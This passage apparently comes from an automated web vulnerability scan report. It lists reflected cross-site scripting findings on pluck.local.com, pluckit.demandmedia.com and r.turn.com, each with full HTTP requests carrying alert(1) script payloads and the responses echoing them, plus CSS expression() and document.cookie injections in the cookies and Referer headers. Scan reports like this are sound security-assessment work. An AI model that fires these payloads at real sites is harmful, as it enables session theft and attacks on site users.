partnerUID="eyI4NCI6IFsiRFRRa2U3VDk5OVk0cVlKQiIsIHRydWVdfQ=="; segments="3391|13746|3392|23864|11262|11265|30353|7775|17277|3425|38781|38582,1298044270|27273|40657|24085|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 03 Feb 2011 19:02:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 03-Feb-2011 19:02:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 368

document.write('<img width="0" height="0" src="http://tag.admeld.com/match346ad';alert(1)//f0a82ea655a?admeld_adprovider_id=300&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1297191762&custom_user_segments=%2C3391%2C13746%2C3392%2C23864%2C11262%2C11265%2C30353%2C7775%2C17277%2C3425%2
...[SNIP]...

4.424. http://pluck.local.com/ver1.0/daapi2.api [jpcb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.local.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload d5e7e<script>alert(1)</script>1fda4ce402e was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcbd5e7e<script>alert(1)</script>1fda4ce402e&jpctx=request_0 HTTP/1.1
Host: pluck.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Thu, 03 Feb 2011 16:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Date: Thu, 03 Feb 2011 16:08:27 GMT
Content-Length: 91

PluckSDKjpcbd5e7e<script>alert(1)</script>1fda4ce402e({
"Envelopes": []
},'request_0');

4.425. http://pluck.local.com/ver1.0/daapi2.api [jpctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.local.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload fa896<script>alert(1)</script>11222906e44 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0fa896<script>alert(1)</script>11222906e44 HTTP/1.1
Host: pluck.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Thu, 03 Feb 2011 16:08:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Date: Thu, 03 Feb 2011 16:08:45 GMT
Content-Length: 91

PluckSDKjpcb({
"Envelopes": []
},'request_0fa896<script>alert(1)</script>11222906e44');

4.426. http://pluckit.demandmedia.com/requests [apiKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the apiKey request parameter is copied into the HTML document as plain text between tags. The payload 3767e<script>alert(1)</script>480207bdcb8 was submitted in the apiKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 920
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:22 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:22 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\":0,\"requestedBy\":\"\",\"message\":\"Unknown customer: c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8\",\"id\":\"4744580d-ffc5-418f-8c03-776a210129be\"}"},{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\"
...[SNIP]...

4.427. http://pluckit.demandmedia.com/requests [jsonpCallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpCallback request parameter is copied into the HTML document as plain text between tags. The payload 546ff<script>alert(1)</script>aa268e625b5 was submitted in the jsonpCallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4368
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:26 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:25 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Customers.GetCustomerResponse","payload":"{\"objectType\":\"Customers.GetCustomerResponse\",\"isError\":false,\"TTL\":0,\"requestedBy
...[SNIP]...

4.428. http://pluckit.demandmedia.com/requests [jsonpContext parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpContext request parameter is copied into the HTML document as plain text between tags. The payload 6b2fe<script>alert(1)</script>7d41626bf96 was submitted in the jsonpContext parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_4423813743186b2fe<script>alert(1)</script>7d41626bf96&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4388
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:28 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Customers.GetCustomerResponse","payload":"{\"objectType\":\"Custo
...[SNIP]...
11a033338c2&t=' + trEscae8b1b2cb1(document.title) + '&r=' + trEscae8b1b2cb1(document.referrer);\r\n})();\r\n//]]>\r\n","ContentTrackingSrc":"","diagnostics":null,"requestedBy":""},'request_4423813743186b2fe<script>alert(1)</script>7d41626bf96');

4.429. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6506f"><script>alert(1)</script>91c27bc8e67 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6506f"><script>alert(1)</script>91c27bc8e67&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
